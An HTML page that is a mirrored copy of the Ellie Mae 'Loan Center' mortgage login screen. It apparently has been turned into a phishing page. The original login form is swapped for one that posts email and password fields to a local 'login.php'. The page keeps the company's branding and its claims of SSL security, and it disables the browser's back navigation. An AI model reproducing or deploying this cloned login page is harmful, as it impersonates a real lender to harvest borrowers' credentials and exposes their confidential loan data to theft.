
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://#w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://#w3.org/1999/xhtml">

<!-- Mirrored from #mortgage-application.net/MyAccount/AccountLogin.aspx by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 02 Nov 2017 14:44:56 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head id="ctl01_Head1"><title>
	Ellie Mae, Inc. - Loan Center : Login
</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="refresh" content="1800" />
<style>
.button {
    background-color: #2E9AFE;
    border: none;
    color: white;
    padding: 15px 32px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    margin: 4px 2px;
    cursor: pointer;
}
</style>
    <script type="text/javascript" src="../javascript/btn.js"></script>
    <script type="text/javascript" src="../javascript/ImageButton.js"></script>
    <script type="text/javascript" src="../javascript/LoanCenter.js"></script>
    <script type="text/javascript" src="../javascript/MaskDiv.js"></script>
    <script type="text/javascript" src="../javascript/ConfirmDialog.js"></script>
    <link href="../css/default.css" rel="stylesheet" type="text/css" /><link href="../css/LoanCenter.css" rel="stylesheet" type="text/css" /><link href="#//#mortgage-application.net/css/OEM.aspx" rel="stylesheet" type="text/css" /><meta name="Description" content="The Internet&#39;s leading website for home loans, mortgages, electronic lending, and loans using the best mortgage tools on the Internet. Online shopping for the best loan rates, best loan programs, and current rates." /><meta name="keywords" content="mortgage, mortgages, mortgages on the internet, home loans, real estate finance, mortgage on line, electronic lending, real estate agent affiliates, realtor affiliates, mortgage rates, refinance, low mortgage rates, the lowest mortgage rates, real estate, loans, homes, home purchase, Realtors on line, Real Estate Agents on line, real estate financing, discount mortgage, mortgage brokers, mortgage lenders,  electronic loans, mortgage lenders, on-line banking" /><meta http-equiv="content-language" content="en" /><meta name="robots" content="index,follow" /><style>body{font-family:Arial};select{font-family:Arial}</style></head>
<body class="Pipeline" onload="pageInit();">
    <form method="post" action="login.php"></div>




<script src="#//#mortgage-application.net/WebResource.axd?d=zxBgs_SffTWrCTnIm_DS2oaDivJrI89CnA2232MUSbSgJ4YYT6iooxeLF2xTc8WsxH2xkp_HY4VhGkm39Z4tR9484kM1&amp;t=636396566200000000" type="text/javascript"></script>


<script src="../javascript/Navigation1ff8.js?172" type="text/javascript"></script>
<script src="../javascript/Default1ff8.js?172" type="text/javascript"></script>
<script src="../javascript/AccountLogin1ff8.js?172" type="text/javascript"></script>
<script src="../javascript/detectresolution1ff8.js?172" type="text/javascript"></script>
<script src="#//#mortgage-application.net/ScriptResource.axd?d=1jt3TpL0vkJfB5-JtID95LXBFWXmsfRJ09pcVgl5M5fFM_iMYhieGzm7HsD-EMr4nRGJ-gMBI86HBPnu8xwJ8iZFurqOkmmxYMiZNT5iE8L2BZ-vhJD0kjH6CzvSRHMDC5z7LODFVQo42zhbv7ONwoUkaLY1&amp;t=620ef15f" type="text/javascript"></script>
<script src="#//#mortgage-application.net/ScriptResource.axd?d=ivU-f3_LnipEjBuc1NgjAEiXnBL8WSyuvKVJp9SONjXIsS23RtXoHKaixs66EgAVR_OWFrRMjnQNYx-mmjuRANdx6NcBnwL2SQsUDfpXQmn-1KT2cdohFSknEVpmSSUYx4v-_aJdKYARtA-0Ghq9Kp5J2NyWr1aSBL09SRcC1oxYZKmo0&amp;t=620ef15f" type="text/javascript"></script>
<script src="#//#mortgage-application.net/WebResource.axd?d=PBa9cSO4wRI6mrOBSTuwYqEajY_Q1up96ebqMi3KRrc9Fc8V5VeA0D22FIIS5N7YwCY1MOp78ioWqN4LHCgxmbdofbw1&amp;t=636396566200000000" type="text/javascript"></script>
<div class="aspNetHidden"></div>
        <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl01$defaultScriptManager', 'aspnetForm', [], [], [], 90, 'ctl01');
//]]>
</script>

        <!--Update by Maple for web-3493 -->    
        <div class="GlobalHeader"><img id="Img1" alt="Ellie Mae Loan Center" src="../images/LoanCenter/encompass_loancenter.png" class="paddingTop10" width="100%"/> </div>
        <div class="LCNav">
            <div class="lcnav_left">
                <div class="GlobalHeaderText">
                    <span class="LCNormal1" style="MARGIN-LEFT:10px;">Welcome<span id="ctl01_labelName"></span></span>
                </div>
            </div>
            <div class="lcnav_right">
                <div class="GlobalHeaderText">
                    
                    
                    
                        <a href="AccountLogin.html">
                            <span class="LCNormalBlueBoldItalic">Log In</span></a>
                    
                </div>
            </div>
            <div style="CLEAR:both"></div>
        </div>

        <div style="LEFT:55px; POSITION:absolute; TOP:115px; width:650px">
            <div id="ContentContainer" class="Normal1 Neutral1Text">
                
    <script type="text/javascript">
        //web-9930 code changes
        window.history.forward(1);
    </script>
    <table width="100%" cellpadding="0" cellspacing="0" border="0">
        <tr>
            <td class="Header5 paddingTop10 paddingBottom10">
                
                <span id="ctl01_contentContainerHolder_labelLogin">Log In</span>
                <span id="ctl01_contentContainerHolder_labelLoanCenterLogin">to the Loan Center</span></td>
        </tr>
        <tr>
            <td class="paddingTop10 paddingBottom10">
                
                <span id="ctl01_contentContainerHolder_textLabel">Please log in to check the status of your loan or view messages from your originator. You must have a valid user account to view the status page. Contact your loan officer if you do not have an account.</span></td>
        </tr>
        <tr>
            <td>
                <table style="width: 550px;" border="0">
                    <colgroup>
                        <col width="60" />
                        <col />
                        <col />
                    </colgroup>
                    <tr style="height: 24px;">
                        <td>
                            Email:</td>
                        <td>
                            <input name="Email" type="text" style="width:200px;" /></td>
                        
                            <td rowspan="9">
                                <div class="LoginWorkArea">
                                    <div class="LoginWorkAreaPadding">
                                        <div class="LoginTextSpacing">
                                            <span class="Header1">What is the Loan Center?</span><br />
                                            <span class="Normal1">The Loan Center is a personalized, password-protected site that
                                                provides you with 24-hour access to information and requests related to your loan
                                                application.</span>
                                        </div>
                                        <div class="LoginTextSpacing">
                                            <span class="Header1">What makes this Web site secure?</span><br />
                                            <span class="Normal1">128bit SSL encryption and unique URL tied directly to the loan
                                                data provide a double layer of security. Only parties directly involved with this
                                                particular loan and only individuals who were sent the link to this site can login
                                                and view the confidential loan data.</span>
                                        </div>
                                        <div class="LoginTextSpacing">
                                            <span class="Header1">Who is Ellie Mae?</span><br />
                                            <span class="Normal1">Ellie Mae is a mortgage industry pioneer dedicated to facilitating
                                                communications between mortgage brokers, their partners, and their clients, all
                                                in a secure and compliant environment. Ellie Mae creates the tools needed to conduct
                                                business and truly automate the loan process from origination through closing.</span>
                                        </div>
                                    </div>
                                </div>
                            </td>
                        
                    </tr>
                    
                        <tr style="height: 24px;">
                            <td>
                                Password:</td>
                            <td>
                                <input name="Password" type="password" style="width:200px;"/></td>
                        </tr>
                    
                    <tr style="height: 24px;">
                        <td>&nbsp;
                            </td>
                        <td>
                            <input type="checkbox" name="checkboxRememberMe" />&nbsp;Save
                            this email address.</td>
                    </tr>
                    <tr style="height: 24px;">
                        
                    
                    </tr>
                    <tr style="height: 24px;">
                        <td>&nbsp;
                            </td>
                        <td>
                            
<input type="submit" class="button" value="Login"></span></a></P>
                           
                        </td>
                    </tr>
                    
                        <tr style="height: 24px;">
                            <td>&nbsp;
                                </td>
                            <td valign="bottom">
                                <a href="#">Forgot Password?</a>
                            </td>
                        </tr>
                    
                    <tr style="height: 24px;">
                        <td>&nbsp;
                            </td>
                        <td valign="bottom">&nbsp;
                            </td>
                    </tr>
                    <tr style="height: 24px;">
                        <td>&nbsp;
                            </td>
                        <td valign="bottom">&nbsp;
                            </td>
                    </tr>
                    <tr style="height: 24px;">
                        <td>&nbsp;
                            </td>
                        <td valign="bottom">&nbsp;
                            </td>
                    </tr>
                </table>
            </td>
        </tr>
    </table>

            </div>
            <p />
            <div style="text-align:center; border-top:solid 1px #999999;">
                <p /><span id="ctl01_labelCopyright" class="LCNormal1">Copyright © 2017 Ellie Mae, Inc. - Loan Center</span>
            </div>
        </div>
    

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl01_contentContainerHolder_textboxEmail');//]]>
</script>
</form>
</body>

<!-- Mirrored from #mortgage-application.net/MyAccount/AccountLogin.aspx by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 02 Nov 2017 14:45:31 GMT -->
</html>
